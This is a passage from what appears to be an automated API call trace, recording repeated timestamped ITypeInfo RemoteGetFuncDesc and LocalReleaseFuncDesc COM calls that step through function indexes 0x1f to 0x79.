ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x20, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.159] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.159] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.160] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.160] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.161] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.161] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: 